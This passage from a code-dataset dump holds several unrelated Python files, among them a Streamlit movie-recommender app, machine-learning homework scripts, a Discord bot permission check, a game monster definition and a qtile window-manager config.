    <div style=\"background-color:{};padding:10px;border-radius:10px;\">\n    <h1 style=\"color:{};text-align:center;\">EDSA Movie Recommendation Challenge</h1>\n    <h2 style=\"text-align:center;\">UNSUPERVISED LEARNING PREDICT - TEAM1</h2>\n    </div>
    \n \"\"\"\n\n title_template =\"\"\"\n
    <div style=\"padding:10px;border-radius:10px;\">\n    <h1 style=\"text-align:center;\">UNSUPERVISED LEARNING PREDICT</h1>\n    <h2 style=\"text-align:center;\">TEAM 1</h2>\n    <h4 style=\"text-align:center;\">Malibongwe Xulu</h4>\n    <h4 style=\"text-align:center;\">Nthabiseng Moela</h4>\n    <h4 style=\"text-align:center;\">Simangele Maphanga</h4>\n    <h4 style=\"text-align:center;\">Kgauhelo Mokgawa</h4>\n    <h4 style=\"text-align:center;\">Manko Mofokeng</h4>\n    <h4 style=\"text-align:center;\">14 December 2020</h4>\n    </div>
    \n \"\"\"\n\n # DO NOT REMOVE the 'Recommender System' option below, however,\n # you are welcome to add more options to enrich your app.\n page_options = [\"Home\",\"Recommender System\",\"About\",\"Exploratory Data Analysis\",\"Solution Overview\"]\n\n # -------------------------------------------------------------------\n # ----------- !! THIS CODE MUST NOT BE ALTERED !! -------------------\n # -------------------------------------------------------------------\n page_selection = st.sidebar.selectbox(\"Choose Option\", page_options)\n if page_selection == \"Recommender System\":\n # Header contents\n st.write('# Movie Recommender Engine')\n st.write('### EXPLORE Data Science Academy Unsupervised Predict')\n st.image('resources/imgs/Image_header.png',use_column_width=True)\n # Recommender System algorithm selection\n sys = st.radio(\"Select an algorithm\",\n ('Content Based Filtering',\n 'Collaborative Based Filtering'))\n\n # User-based preferences\n st.write('### Enter Your Three Favorite Movies')\n movie_1 = st.selectbox('First Option',title_list[14930:15200])\n movie_2 = st.selectbox('Second Option',title_list[25055:25255])\n movie_3 = st.selectbox('Third Option',title_list[21100:21200])\n fav_movies = [movie_1,movie_2,movie_3]\n\n # Perform top-10 movie recommendation generation\n if sys == 'Content Based Filtering':\n if st.button(\"Recommend\"):\n with st.spinner('Crunching the numbers...'):\n top_recommendations = content_model(movie_list=fav_movies,\n top_n=10)\n st.title(\"We think you'll like:\")\n for i,j in enumerate(top_recommendations):\n st.subheader(str(i+1)+'. '+j)\n\n\n\n if sys == 'Collaborative Based Filtering':\n if st.button(\"Recommend\"):\n with st.spinner('Crunching the numbers...'):\n top_recommendations = collab_model(movie_list=fav_movies,\n top_n=10)\n st.title(\"We think you'll like:\")\n for i,j in enumerate(top_recommendations):\n st.subheader(str(i+1)+'. '+j)\n\n\n\n # -------------------------------------------------------------------\n\n # ------------- SAFE FOR ALTERING/EXTENSION -------------------\n \n if page_selection == \"Home\":\n st.markdown(html_template.format('royalblue','white'), unsafe_allow_html=True)\n st.image('resources/imgs/Home.PNG',use_column_width=True) \n #st.markdown(title_template, unsafe_allow_html=True)\n\n if page_selection == \"About\":\n #markup(page_selection)\n st.write(\"### Oveview: Flex your Unsupervised Learning skills to generate movie recommendations\")\n \n # You can read a markdown file from supporting resources folder\n #if st.checkbox(\"Introduction\"):\n st.subheader(\"Introduction to Unsupervised Learning Predict\")\n st.write(\"\"\"In today’s technology driven world, recommender systems are socially and economically critical for ensuring that individuals can make appropriate choices surrounding the content they engage with on a daily basis. 
One application where this is especially true surrounds movie content recommendations; where intelligent algorithms can help viewers find great titles from tens of thousands of options.\"\"\")\n        st.write(\"\"\"With this context, EDSA is challenging you to construct a recommendation algorithm based on content or collaborative filtering, capable of accurately predicting how a user will rate a movie they have not yet viewed based on their historical preferences.\"\"\")\n        st.write(\"\"\"Providing an accurate and robust solution to this challenge has immense economic potential, with users of the system being exposed to content they would like to view or purchase - generating revenue and platform affinity.\"\"\")\n\n        #if st.checkbox(\"Problem Statement\"):\n        st.subheader(\"Problem Statement of the Unsupervised Learning Predict\")\n        st.write(\"Build recommender systems to recommend a movie\")\n\n        #if st.checkbox(\"Data\"):\n        st.subheader(\"Data Overview\")\n        st.write(\"\"\"This dataset consists of several million 5-star ratings obtained from users of the online MovieLens movie recommendation service. The MovieLens dataset has long been used by industry and academic researchers to improve the performance of explicitly-based recommender systems, and now you get to as well!\"\"\")\n\n        st.write(\"\"\"For this Predict, we'll be using a special version of the MovieLens dataset which has been enriched with additional data, and resampled for fair evaluation purposes.\"\"\")\n\n        st.write(\"\"\"### Source:\"\"\") \n        st.write(\"\"\"The data for the MovieLens dataset is maintained by the GroupLens research group in the Department of Computer Science and Engineering at the University of Minnesota. Additional movie content data was legally scraped from IMDB\"\"\")\n\n\n        st.write(\"\"\"### Supplied Files:\n        genome_scores.csv - a score mapping the strength between movies and tag-related properties. Read more here\n\n        genome_tags.csv - user assigned tags for genome-related scores\n\n        imdb_data.csv - Additional movie metadata scraped from IMDB using the links.csv file.\n\n        links.csv - File providing a mapping between a MovieLens ID and associated IMDB and TMDB IDs.\n\n        sample_submission.csv - Sample of the submission format for the hackathon.\n\n        tags.csv - User assigned tags for the movies within the dataset.\n\n        test.csv - The test split of the dataset. Contains user and movie IDs with no rating data.\n\n        train.csv - The training split of the dataset. 
Contains user and movie IDs with associated rating data.\"\"\")\n\n # st.subheader(\"Raw Twitter data and label\")\n # if st.checkbox('Show raw data'): # data is hidden if box is unchecked\n # st.write(raw[['sentiment', 'message']]) # will write the df to the page\n\n if page_selection == \"Exploratory Data Analysis\":\n st.title('Exploratory Data Analysis')\n\n if st.checkbox(\"ratings\"):\n st.subheader(\"Movie ratings\")\n st.image('resources/imgs/rating.PNG',use_column_width=True)\n\n # if st.checkbox(\"correlation\"):\n # st.subheader(\"Correlation between features\")\n # st.image('resources/imgs/correlation.png',use_column_width=True)\n \n if st.checkbox(\"genre wordcloud\"):\n st.subheader(\"Top Genres\")\n st.image('resources/imgs/genre_wordcloud.png',use_column_width=True)\n \n if st.checkbox(\"genres\"):\n st.subheader(\"Top Genres\")\n st.image('resources/imgs/top_genres.PNG',use_column_width=True)\n \n # if st.checkbox(\"movies released per year\"):\n # st.subheader(\"Movies released per year\")\n # st.image('resources/imgs/release_year.png',use_column_width=True)\n\n if st.checkbox(\"tags\"):\n st.subheader(\"Top tags\")\n st.image('resources/imgs/top_tags.PNG',use_column_width=True)\n\n if st.checkbox(\"cast\"):\n st.subheader(\"Popular cast\")\n st.image('resources/imgs/cast.PNG',use_column_width=True)\n\n # if page_selection == \"Recommend a movie\":\n # st.title(\"Recommend a movie\")\n # sys = st.radio(\"Select an algorithm\",\n # ('Content Based Filtering',\n # 'Collaborative Based Filtering'))\n\n\n if page_selection == \"Solution Overview\":\n st.title(\"Solution Overview\")\n st.write(\"RMSE of the recommendation models to show their performance\")\n st.image('resources/imgs/performance_df.PNG',use_column_width=True)\n\n\n # You may want to add more sections here for aspects such as an EDA,\n # or to provide your business pitch.\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Simangele101/unsupervised-predict-streamlit-template","sub_path":"edsa_recommender.py","file_name":"edsa_recommender.py","file_ext":"py","file_size_in_byte":10562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70591919475","text":"# https://www.tutorialspoint.com/python/tk_button.htm\nfrom tkinter import *\nimport time\n\nroot = Tk()\nroot.geometry('500x300+1000+500')\n\n\n# 1st Example\ndef check_time():\n btn_time['text'] = time.strftime('%H:%M:%S')\n print(time.strftime('%H:%M:%S'))\n\n\nbtn_time = Button(root, text='Check Time', command=check_time)\nbtn_time.pack()\n\n\n# 2nd Example\nroot.title('Counter')\nclicks = 0\n\n\ndef counter():\n global clicks\n clicks += 1\n root.title(f'Counter: {clicks}')\n\n\nbtn_cnt = Button(root, text='Counter', command=counter)\nbtn_cnt.pack()\n\n\nroot.mainloop()\n","repo_name":"bigalex95/tkinterExamples","sub_path":"tkinter/tkinterExamples/lesson3/lesson3.py","file_name":"lesson3.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73097507955","text":"# -*- coding:UTF-8 -*-\n\"\"\"\nTrain models and show the results\n@author: ZhaoHe\n\"\"\"\nimport os\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nfrom src.data import Data\nfrom src.config import train_path, test_path, submission_sample, submission_dir, images_dir\nfrom src.classifiers import classifier_xgboost, classifier_dicisionTree, classifier_SVM\nfrom src.clusters import 
 cluster_KMeans, cluster_Hierarchical, cluster_Spectral\n\ndef get_submission(pred, model_name):\n    submission_df = pd.read_csv(submission_sample, header=0)\n    for i in range(len(pred)):\n        submission_df.loc[i,'Survived'] = pred[i]\n    out_file = os.path.join(submission_dir, model_name)\n    submission_df.to_csv(out_file, index=False)\n\ndef pca(X_multi_dim):\n    pca_model = PCA(n_components=2)\n    X_2_dim = pca_model.fit_transform(X_multi_dim)\n    return X_2_dim\n\ndef plot_result(pca_X, label_Y, title):\n    class0_x, class0_y = [], []\n    class1_x, class1_y = [], []\n    for i in range(len(pca_X)):\n        if label_Y[i] == 0:\n            class0_x.append(pca_X[i][0])\n            class0_y.append(pca_X[i][1])\n        elif label_Y[i] == 1:\n            class1_x.append(pca_X[i][0])\n            class1_y.append(pca_X[i][1])\n    plt.plot(class0_x, class0_y, 'or', label='No-Survived')\n    plt.plot(class1_x, class1_y, 'ob', label='Survived')\n    plt.title(title)\n    plt.legend()\n    plt.savefig(os.path.join(images_dir, title))\n    plt.close()\n\n\ndef train_models(train_X, train_Y, test_X):\n    # Classify using Xgboost\n    pred_Y = classifier_xgboost(train_X, train_Y, test_X)\n    get_submission(pred_Y, 'xgboost')\n\n    # Classify using decisionTree\n    pred_Y = classifier_dicisionTree(train_X, train_Y, test_X)\n    get_submission(pred_Y, 'decisionTree')\n\n    # Classify using SVM\n    pred_Y = classifier_SVM(train_X, train_Y, test_X)\n    get_submission(pred_Y, 'SVM')\n\n    # Cluster using KMeans\n    pred_Y = cluster_KMeans(train_X, test_X)\n    get_submission(pred_Y, 'KMeans')\n\n    # Cluster using Hierarchical\n    pred_Y = cluster_Hierarchical(test_X)\n    get_submission(pred_Y, 'Hierachical')\n\n    # Cluster using Spectral\n    pred_Y = cluster_Spectral(test_X)\n    get_submission(pred_Y, 'Spectral')\n\ndef visualize_models(train_X, train_Y, test_X):\n    # PCA on X\n    new_train_X = pca(train_X)\n    new_test_X = pca(test_X)\n\n    # Visualize the train set\n    plot_result(new_train_X, train_Y, 'Train Set')\n\n    # Visualize the Xgboost\n    sub_file = os.path.join(submission_dir, 'xgboost')\n    data = pd.read_csv(sub_file, header=0)\n    label_y = data['Survived']\n    plot_result(new_test_X, label_y, 'Xgboost')\n\n    # Visualize the decisionTree\n    sub_file = os.path.join(submission_dir, 'decisionTree')\n    data = pd.read_csv(sub_file, header=0)\n    label_y = data['Survived']\n    plot_result(new_test_X, label_y, 'DecisionTree')\n\n    # Visualize the SVM\n    sub_file = os.path.join(submission_dir, 'SVM')\n    data = pd.read_csv(sub_file, header=0)\n    label_y = data['Survived']\n    plot_result(new_test_X, label_y, 'SVM')\n\n    # Visualize the KMeans\n    sub_file = os.path.join(submission_dir, 'KMeans')\n    data = pd.read_csv(sub_file, header=0)\n    label_y = data['Survived']\n    plot_result(new_test_X, label_y, 'KMeans')\n\n    # Visualize the Hierachical\n    sub_file = os.path.join(submission_dir, 'Hierachical')\n    data = pd.read_csv(sub_file, header=0)\n    label_y = data['Survived']\n    plot_result(new_test_X, label_y, 'Hierachical')\n\n    # Visualize the Spectral\n    sub_file = os.path.join(submission_dir, 'Spectral')\n    data = pd.read_csv(sub_file, header=0)\n    label_y = data['Survived']\n    plot_result(new_test_X, label_y, 'Spectral')\n\n\n\n\nif __name__ == \"__main__\":\n    data = Data()\n    train_X, train_Y = data.load_data(train_path)\n    test_X = data.load_data(test_path, train = False)\n\n    #train_models(train_X, train_Y, test_X)\n    visualize_models(train_X, train_Y, 
test_X)","repo_name":"zhaohe1995/BIT2018-DataMiningHomework","sub_path":"Homework3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"44877835735","text":"n = int(input())\nmistakes = 0\ncorrectdict = {}\nfor i in range(n):\n x, s = input().split()\n correctdict[x] = s\nfor i in range(n):\n x,s = input().split()\n if sorted(correctdict[x]) != sorted(s):\n mistakes += 1\n \nprint(mistakes)","repo_name":"nikhiljsk/Programming","sub_path":"Competitive Prog/Hackerearth/cyphsept/hungryowleagle.py","file_name":"hungryowleagle.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19233097341","text":"__author__ = 'jacob'\nimport pyvtk, math, os\nfrom glob import glob\nimport numpy\n#import visit_writer\n\nfilename = 'chymera_data.vtk'\ntitle = 'Test CHYMERA Output'\n\n\nNX = 256\nNZ = 66\nNY = 128\n\n\ndef BlendPoint(A, B, t):\n return [(1. - t) * A[0] + t * B[0], (1. - t) * A[1] + t * B[1], (1. - t) * A[2] + t * B[2]]\n\n\ndef GetMeshPoints(angle, angle2):\n p = []\n for k in range(NZ):\n z = float(k) / float(NZ - 1)\n for j in range(NY):\n y = float(j) / float(NY - 1)\n for i in range(NX):\n x = float(i) / float(NX - 1)\n A = [y * math.cos(angle), y * math.sin(angle), z]\n B = [y * math.cos(angle2), y * math.sin(angle2), z]\n p += BlendPoint(A, B, x)\n return p\n\n\ndef GetMeshConnectivity():\n c = []\n for k in range(NZ - 1):\n for j in range(NY - 1):\n for i in range(NX - 1):\n # Make a hole\n if i == 1 and j == 2:\n continue\n\n i0 = k * NY * NX + j * NX + i\n i1 = k * NY * NX + j * NX + (i + 1)\n i2 = k * NY * NX + (j + 1) * NX + (i + 1)\n i3 = k * NY * NX + (j + 1) * NX + i\n\n i4 = (k + 1) * NY * NX + j * NX + i\n i5 = (k + 1) * NY * NX + j * NX + (i + 1)\n i6 = (k + 1) * NY * NX + (j + 1) * NX + (i + 1)\n i7 = (k + 1) * NY * NX + (j + 1) * NX + i\n\n c.append([i0, i1, i2, i3, i4, i5, i6, i7])\n return c\n\n\ndef ReadGridData(filename):\n grid_data = []\n with open(filename, 'r') as data_file:\n for line in data_file:\n grid_data.append(float(line))\n return grid_data\n\n\ndef GetGridData():\n '''\n Gets the data from the output of binaryReader\n :return: A list of lists of grid data\n '''\n grid_data = []\n set_of_grids = glob(pathname=\"./GridData*.txt\")\n print(\"Getting Grid Data\")\n for grid in set_of_grids:\n grid_data.append(ReadGridData(grid))\n print(\"Finished GridData\")\n return grid_data\n\n\ndef GetMetaData():\n filename = os.path.join(\"MetaDataVTK.txt\")\n meta_data = ReadGridData(filename=filename)\n return meta_data\n\n\ndef WriteProxyDataset():\n filename = \"chymeraData.visit\"\n with open(filename, \"wt\") as all_data:\n all_data.write(\"!NBLOCKS 360\\n\")\n\n #f = open(\"test.visit\", \"wt\")\n #f.write(\"!NBLOCKS 360\\n\")\n # Get the mesh 6 times and add it all up.\n #all_pts = []\n #size_of_grid = NZ*NX*NY\n #connections_size = 8*size_of_grid\n #print(connections_size)\n #points_size = 3*size_of_grid\n # Create memmaps to deal with Python running out of memory\n #all_conn = numpy.memmap(os.path.join(\"/media/jacob/New Volume/\",\"connections.memmap\"), mode=\"w+\", dtype=\"int\", shape=(connections_size, connections_size))\n #all_pts = numpy.memmap(\"points.memmap\", mode=\"w+\", dtype=\"float16\", shape=(points_size, points_size))\n #all_var = []\n #pts_length = 0\n #conn_length = 0\n values = GetGridData()\n for i in range(360):\n 
pts = []\n        conn = []\n        angle = math.radians(float(i) * 1.)\n        angle2 = math.radians(float(i + 1) * 1.)\n        pts += GetMeshPoints(angle, angle2)\n        conn += GetMeshConnectivity()\n        var = []\n        grid = pyvtk.UnstructuredGrid(points=pts, hexahedron=conn)\n        print(\"Finished Unstructured Grid\")\n        # Get the GridData\n        end_point = int(i + ((len(pts) - 1) / 3))\n        print(int(i + ((len(pts) -1) / 3)))\n        celldata = pyvtk.CellData(pyvtk.Scalars(values[0][i:end_point], name=\"data1\"),\n                                  pyvtk.Scalars(values[1][i:end_point], name=\"data2\"),\n                                  pyvtk.Scalars(values[2][i:end_point], name=\"data3\"),\n                                  pyvtk.Scalars(values[3][i:end_point], name=\"data4\"),\n                                  pyvtk.Scalars(values[4][i:end_point], name=\"data5\"),)\n\n        vtk = pyvtk.VtkData(grid, celldata, title)\n        vtk.tofile(\"chymera%d.vtk\" % i)\n        all_data.write(\"chymera%d.vtk\\n\" % i)\n        print(\"Done in i range \" + str(i))\n\n\nWriteProxyDataset()","repo_name":"jacobbieker/chymera-vis","sub_path":"chymeraToVTK.py","file_name":"chymeraToVTK.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26225827723","text":"from .universal import ContainerMeta\n\n\nclass LEVY_AREA_APPROXIMATIONS(metaclass=ContainerMeta):  # noqa\n    none = \"none\"  # Don't compute any Levy area approximation\n    space_time = \"space-time\"  # Only compute an (exact) space-time Levy area\n    davie = \"davie\"  # Compute Davie's approximation to Levy area\n    foster = (\n        \"foster\"  # Compute Foster's correction to Davie's approximation to Levy area\n    )\n","repo_name":"DrownFish19/PaddleXDE","sub_path":"paddlexde/utils/sde_settings.py","file_name":"sde_settings.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"33638472355","text":"from datetime import date \n\narchivo = open(\"repaso/M2/nacidos.csv\")\nl = archivo.readlines()\naP = 1998\nl.pop(0)\n\nfor personas in l:\n    pC = personas.find(\",\")\n    aN = int(personas[pC+1:pC+5])\n    mN = int(personas[pC+6:pC+8])\n    dN = int(personas[pC+9:pC+11])\n    fechaNac = date(aN,mN, dN)\n    veranoInicio = date(aP-1, 12, 21)\n    veranoFin = date(aP, 3, 20)\n    if veranoInicio <= fechaNac <= veranoFin:\n        print(personas[:-1])\n","repo_name":"pablokan/22prog1","sub_path":"repaso/M2/pr8.py","file_name":"pr8.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74834036273","text":"import argparse\n\nimport pytest\nfrom support import timing\n\n\ndef compute(s):\n    schedule = [x for x in s.splitlines()[1].split(\",\")]\n    bus_ids = [int(x) for x in schedule if x != \"x\"]\n    (step, t) = bus_ids[0], 0\n    for b in bus_ids[1:]:\n        while (t + schedule.index(str(b))) % b:\n            t += step\n        step *= b\n    return t\n\n\n@pytest.mark.parametrize(\n    ('input_s', 'expected'),\n    (\n        (\"\"\"123\n7,13,x,x,59,x,31,19\"\"\", 1068781),\n        (\"\"\"123\n17,x,13,19\"\"\", 3417),\n        (\"\"\"234\n1789,37,47,1889\"\"\", 1202161486),\n    ),\n)\ndef test(input_s, expected):\n    assert compute(input_s) == expected\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('data_file')\n    args = parser.parse_args()\n\n    with open(args.data_file) as f, timing():\n        print(compute(f.read()))\n\n    return 0\n\n\nif __name__ == '__main__':\n    
exit(main())\n","repo_name":"itallix/advent-of-code-2020","sub_path":"day13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22741683324","text":"from utils.custom_context import MyContext\nfrom ..settings.get_setting import get_setting\nfrom ..errors import NotManager, NoGiveawayPermissions\nfrom bot import MetroBot\n\nimport discord\nfrom discord.ext import commands\n\n\ndef giveaway_manager_check():\n async def predicate(ctx: MyContext):\n\n manager = await get_setting(ctx.bot, 'manager', ctx.guild.id)\n\n role = ctx.guild.get_role(manager) # manager can be none and this will still work\n if not role:\n if not ctx.author.guild_permissions.manage_guild:\n raise NoGiveawayPermissions(f'You need `Manage Guild` permissions to use this.')\n else:\n if not role in ctx.author.roles and not ctx.author.guild_permissions.manage_guild:\n raise NotManager(f'You need to be a giveaway manager (<@&{manager}>) to use this.')\n return True\n return commands.check(predicate)\n\nasync def giveaway_manager_check_interaction(bot: MetroBot, interaction: discord.Interaction,):\n \"\"\"Check if `Interaction.user` is a giveaway manager.\"\"\"\n manager = await get_setting(bot, 'manager', interaction.guild_id)\n\n role = interaction.guild.get_role(manager) # manager can be none and this will still work\n if not role:\n if not interaction.user.guild_permissions.manage_guild:\n await interaction.followup.send(f'You need `Manage Guild` permissions to use this.', ephemeral=True)\n return False\n else:\n if not role in interaction.user.roles and not interaction.user.guild_permissions.manage_guild:\n await interaction.followup.send(f'You need to be a giveaway manager (<@&{manager}>) to use this.', ephemeral=True)\n return False\n return True\n \n","repo_name":"dartmern/metro","sub_path":"cogs/giveaway_rewrite/checks/manager_check.py","file_name":"manager_check.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"39"} +{"seq_id":"24028963834","text":"mutated_bat = genMonster(\"Mutated Bat\", 307, 9829)\nmutated_bat.health(900)\nmutated_bat.type(\"blood\")\nmutated_bat.defense(armor=20, fire=1, earth=0, energy=1, ice=1, holy=1, death=0, physical=1, drown=0)\nmutated_bat.experience(615)\nmutated_bat.speed(245)\nmutated_bat.behavior(summonable=0, hostile=True, illusionable=False, convinceable=0, pushable=False, pushItems=True, pushCreatures=True, targetDistance=1, runOnHealth=300)\nmutated_bat.walkAround(energy=0, fire=0, poison=0)\nmutated_bat.immunity(paralyze=1, invisible=1, lifedrain=1, drunk=1)\nmutated_bat.voices(\"Shriiiiiek\")\nmutated_bat.melee(169, condition=CountdownCondition(CONDITION_POISON, 6), conditionChance=100)\nmutated_bat.loot( (2148, 100, 130), (\"star herb\", 5.0), (\"rusty armor\", 13.0, 2), (\"battle shield\", 7.75), (\"obsidian lance\", 7.0), (\"bat wing\", 7.75, 3), (\"mutated bat ear\", 5.0), (\"energy ring\", 1.0), (\"small amethyst\", 0.75, 2), (\"black pearl\", 1.75, 3), (\"batwing hat\", 0.0025), (\"mercenary sword\", 0.0025), (\"black shield\", 0.0025) )","repo_name":"VAPus/PyOT-Legacy","sub_path":"data/monsters/Mammals/Mutated/Mutated Bat.py","file_name":"Mutated Bat.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"} +{"seq_id":"1638052124","text":"import sys\n\ni = 
0\nnomes={}\nfor s in sys.stdin:\n\tx = s.split()\n\tnomes[i] = []\n\tfor j in x:\n\t\tnomes[i].append(j)\n\ti+=1\n\nx = sorted(nomes.items(), key=lambda x: (len(x[1]),x[1])) # add spaces to the middle names\nfor i in range(len(x)):\n\tfor j in range(len(x[i][1])-1):\n\t\tx[i][1][j]+=' '\n\nl = len(x)\nfor y in x:\n\txx = y[1]\n\tfor i in range(len(xx)):\n\t\tsys.stdout.write(xx[i])\n\tprint()\n\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n","repo_name":"JoGomes19/LA2","sub_path":"Torneio1 - 20/nome.py","file_name":"nome.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"7526432539","text":"######################################################################\n\n# __ _ ___ _ _ #\n# /\\ \\ \\ ___ (_) ____ / __\\ ___ __| |(_) _ __ __ _ #\n# / \\/ // _ \\ | ||_ /_____ / / / _ \\ / _` || || '_ \\ / _` | #\n# / /\\ /| (_) || | / /|_____|/ /___| (_) || (_| || || | | || (_| | #\n# \\_\\ \\/ \\___/ |_|/___| \\____/ \\___/ \\__,_||_||_| |_| \\__, | #\n# |___/ #\n\n######################################################################\n\nfrom libqtile import bar, layout, widget\nfrom libqtile.config import Click, Drag, Group, Key, Match, Screen\nfrom libqtile.lazy import lazy\nfrom libqtile.utils import guess_terminal\nfrom qtile_extras import widget\nfrom qtile_extras.widget.decorations import PowerLineDecoration\n\nmod = \"mod4\"\nterminal = guess_terminal()\n\npowerline = {\n    \"decorations\": [\n        PowerLineDecoration(path=\"forward_slash\",\n                            size=7)\n    ]\n}\n\nkeys = [\n    Key([mod], \"h\", lazy.layout.left(), desc=\"Move focus to left\"),\n    Key([mod], \"l\", lazy.layout.right(), desc=\"Move focus to right\"),\n    Key([mod], \"j\", lazy.layout.down(), desc=\"Move focus down\"),\n    Key([mod], \"k\", lazy.layout.up(), desc=\"Move focus up\"),\n    Key([mod], \"m\", lazy.window.toggle_maximize(), desc=\"Toggle maximize windows\"),\n    Key([mod], \"space\", lazy.layout.next(), desc=\"Move window focus to other window\"),\n    Key([mod, \"shift\"], \"h\", lazy.layout.shuffle_left(), desc=\"Move window to the left\"),\n    Key([mod, \"shift\"], \"l\", lazy.layout.shuffle_right(), desc=\"Move window to the right\"),\n    Key([mod, \"shift\"], \"j\", lazy.layout.shuffle_down(), desc=\"Move window down\"),\n    Key([mod, \"shift\"], \"k\", lazy.layout.shuffle_up(), desc=\"Move window up\"),\n    Key([mod, \"control\"], \"h\", lazy.layout.grow_left(), desc=\"Grow window to the left\"),\n    Key([mod, \"control\"], \"l\", lazy.layout.grow_right(), desc=\"Grow window to the right\"),\n    Key([mod, \"control\"], \"j\", lazy.layout.grow_down(), desc=\"Grow window down\"),\n    Key([mod, \"control\"], \"k\", lazy.layout.grow_up(), desc=\"Grow window up\"),\n    Key([mod], \"n\", lazy.layout.normalize(), desc=\"Reset all window sizes\"),\n    Key(\n        [mod, \"shift\"],\n        \"Return\",\n        lazy.layout.toggle_split(),\n        desc=\"Toggle between split and unsplit sides of stack\",\n    ),\n    Key([mod], \"Return\", lazy.spawn(\"kitty\"), desc=\"Launch terminal\"),\n    Key([mod], \"Tab\", lazy.next_layout(), desc=\"Toggle between layouts\"),\n    Key([mod], \"w\", lazy.window.kill(), desc=\"Kill focused window\"),\n    Key([mod, \"control\"], \"r\", lazy.reload_config(), desc=\"Reload the config\"),\n    Key([mod, \"control\"], \"q\", lazy.shutdown(), desc=\"Shutdown Qtile\"),\n    Key([mod], \"r\", lazy.spawn(\"dmenu_run\"), desc=\"launch dmenu\"),\n    Key([mod], \"s\", lazy.spawn(\"xfce4-settings-manager\"), desc=\"settings\"),\n\n    #### APPS ####\n    Key([mod], \"b\", lazy.spawn(\"brave\"), 
desc=\"Launches brave browser\"),\n Key([mod], \"c\", lazy.spawn(\"codium\"), desc=\"open vscode\"),\n Key([mod], \"q\", lazy.spawn(\"pcmanfm\"), desc=\"open file explorer\"),\n\n # Toggle keyboard layout\n Key([mod],\"f11\", lazy.widget[\"keyboardlayout\"].next_keyboard(), desc=\"Next keyboard layout\"),\n\n # Media\n Key([], \"XF86AudioLowerVolume\", lazy.spawn(\"amixer sset Master 2%-\"), desc=\"Lower Volume by 2%\"),\n Key([], \"XF86AudioRaiseVolume\", lazy.spawn(\"amixer sset Master 2%+\"), desc=\"Raise Volume by 2%\")\n]\n\ngroups = [Group(i) for i in \"1234567\"]\n\nfor i in groups:\n keys.extend(\n [\n Key(\n [mod],\n i.name,\n lazy.group[i.name].toscreen(),\n desc=\"Switch to group {}\".format(i.name),\n ),\n Key(\n [mod, \"shift\"],\n i.name,\n lazy.window.togroup(i.name, switch_group=True),\n desc=\"Switch to & move focused window to group {}\".format(i.name),\n ),\n ]\n )\n\nlayouts = [\n layout.Tile(\n margin = 12,\n border_focus=\"51E0F0\",\n border_width=2),\n]\n\nwidget_defaults = dict(\n font=\"sans\",\n fontsize=12,\n padding=3,\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(\n wallpaper=\"/home/noisefuck/Pictures/blue1.jpeg\",\n wallpaper_mode='fit',\n top=bar.Bar(\n [\n widget.GroupBox(font=\"sans Bold\",\n this_current_screen_border=\"51E0F0\",\n border_width=20),\n widget.Prompt(),\n widget.WindowName(foreground=\"51E0F0\",\n font=\"sans Bold\"),\n widget.Chord(\n chords_colors={\n \"launch\": (\"#ff0000\", \"#ffffff\"),\n },\n name_transform=lambda name: name.upper(),\n ),\n widget.Systray(),\n widget.Battery(background=[\"1F1F1F\"], # Just to create the last arrow effect\n foreground=\"131313\",\n fontsize=0.1,\n **powerline),\n widget.CheckUpdates(distro='Arch_checkupdates',\n update_interval=1800,\n display_format=\"🗘 : {updates}\",\n no_update_string=\"🗘 : 0\",\n font=\"sans Bold\",\n colour_no_updates=\"FFFFFF\",\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n **powerline),\n widget.CPU(format=\"ï’¼ {freq_current}GHz {load_percent}%\",\n foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Memory(measure_mem='G',\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Net(interface=\"enp8s0\",\n format='↑{up} ↓{down}',\n foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.Clock(format=\"%d-%m %a %I:%M %p\",\n foreground=\"FFFFFF\",\n background=\"51E0F0\",\n font=\"sans Bold\",\n **powerline),\n widget.PulseVolume(foreground=\"FFFFFF\",\n background=\"5180F0\",\n font=\"sans Bold\",\n **powerline),\n widget.KeyboardLayout(configured_keyboards=['us','gr'],\n foreground=\"FFFFFF\",\n font=\"sans Bold\",\n background=\"51E0F0\",\n **powerline),\n ],\n 22, background=[\"1F1F1F\"],\n ),\n ),\n]\n\nmouse = [\n Drag([mod], \"Button1\", lazy.window.set_position_floating(), start=lazy.window.get_position()),\n Drag([mod], \"Button3\", lazy.window.set_size_floating(), start=lazy.window.get_size()),\n Click([mod], \"Button2\", 